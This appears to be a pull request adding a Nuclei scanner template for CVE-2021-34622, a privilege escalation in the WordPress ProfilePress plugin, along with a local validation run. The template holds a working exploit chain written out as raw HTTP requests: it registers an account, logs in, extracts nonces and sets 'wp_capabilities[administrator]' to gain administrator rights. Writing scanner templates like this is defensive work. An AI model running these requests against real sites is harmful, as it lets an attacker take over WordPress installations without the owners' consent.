### PR TITLE
Add CVE-2021-34622.yaml (vKEVs)

### DIFF
--- a/http/cves/2021/CVE-2021-34622.yaml
+++ b/http/cves/2021/CVE-2021-34622.yaml
@@ -17,7 +17,7 @@ variables:
 requests:
   - raw:
       - |
-        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/101.0 Safari/537.36
         Connection: close
@@ -55,7 +55,7 @@ requests:
         --{{boundary}}--
 
       - |
-        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/101.0 Safari/537.36
         Connection: close
@@ -76,7 +76,7 @@ requests:
 
   - raw:
       - |
-        GET /wordpress/account/edit-profile/ HTTP/1.1
+        GET /account/edit-profile/ HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0
         Connection: close
@@ -85,7 +85,7 @@ requests:
         Accept-Encoding: gzip
 
       - |
-        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0
         Connection: close

--- a/http/cves/2021/CVE-2021-34622.yaml
+++ b/http/cves/2021/CVE-2021-34622.yaml
@@ -1,0 +1,167 @@
+id: CVE-2021-34622
+
+info:
+  name: WordPress ProfilePress <= 3.1.3
+  author: Sourabh-Sahu
+  severity: critical
+  description: |
+    The ProfilePress plugin allows authenticated users to update their profile including arbitrary usermeta fields. Due to insufficient validation of profile-update inputs, an authenticated user can supply `wp_capabilities` during profile update, enabling escalation to administrator privileges.
+  tags: cve20,wp,authenticated
+
+variables:
+  username: demo
+  password: 123
+  email: demo@gmail.com
+  boundary: "WebKitFormBoundarypRyCNwmSkLdfNd7E"
+
+requests:
+  - raw:
+      - |
+        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/101.0 Safari/537.36
+        Connection: close
+        Content-Type: multipart/form-data; boundary={{boundary}}
+        Accept-Encoding: gzip
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_username"
+
+        {{username}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_email"
+
+        {{email}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_password"
+
+        {{password}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_password_present"
+
+        true
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_first_name"
+
+        demo
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_last_name"
+
+        demo
+        --{{boundary}}
+        Content-Disposition: form-data; name="action"
+
+        pp_ajax_signup
+        --{{boundary}}--
+
+      - |
+        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/101.0 Safari/537.36
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+        Accept-Encoding: gzip
+
+        action=pp_ajax_login&data=login_username%3D{{username}}%26login_password%3D{{password}}%26login_form_id%3D1
+
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        name: login_cookie
+        part: header
+        internal: true
+        regex:
+          - "wordpress_logged_in_[^=]+=([^;]+);"
+
+  - raw:
+      - |
+        GET /wordpress/account/edit-profile/ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Connection: close
+        Cookie: {{login_cookie}}
+        Accept: text/html
+        Accept-Encoding: gzip
+
+      - |
+        POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Connection: close
+        Cookie: {{login_cookie}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+        Accept-Encoding: gzip
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="reg_username"
+
+        {{username}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="eup_email"
+
+        {{email}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="eup_first_name"
+
+        demo
+        --{{boundary}}
+        Content-Disposition: form-data; name="eup_last_name"
+
+        demo
+        --{{boundary}}
+        Content-Disposition: form-data; name="eup_display_name"
+
+        demo
+        --{{boundary}}
+        Content-Disposition: form-data; name="_wpnonce"
+
+        {{wpnonce}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="nonce"
+
+        {{nonce}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="ppmyac_form_action"
+
+        updateProfile
+        --{{boundary}}
+        Content-Disposition: form-data; name="action"
+
+        pp_ajax_editprofile
+        --{{boundary}}
+        Content-Disposition: form-data; name="is_melange"
+
+        true
+        --{{boundary}}
+        Content-Disposition: form-data; name="wp_capabilities[administrator]"
+
+        1
+        --{{boundary}}--
+
+    extractors:
+      - type: regex
+        name: wpnonce
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - 'name="_wpnonce"\s+value="([^"]+)"'
+          - "name='_wpnonce'\\s+value='([^']+)'"
+
+      - type: regex
+        name: nonce
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '"nonce"\s*:\s*"([^"]+)"'
+          - 'pp_ajax_form\s*=\s*\{[^}]*"nonce"\s*:\s*"([^"]+)"'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "updated"
+        condition: or                              


### PR DESCRIPTION
### Template / PR Information

The ProfilePress plugin allows authenticated users to update their profile including arbitrary usermeta fields. Due to insufficient validation of profile-update inputs, an authenticated user can supply `wp_capabilities` during profile update, enabling escalation to administrator privileges.

- References: https://wpscan.com/vulnerability/cf13b0f8-5815-4d27-a276-5eff8985fc0b/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```bash
$ nuclei -t CVE-2021-34622.yaml -u http://192.168.2.114/wordpress       

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.2

		projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.2 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2021-34622] [http] [critical] http://192.168.2.114/wordpress/account/edit-profile/
[CVE-2021-34622] [http] [critical] http://192.168.2.114/wordpress/wp-admin/admin-ajax.php

````

[debug.txt](https://github.com/user-attachments/files/22335778/debug.txt)


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)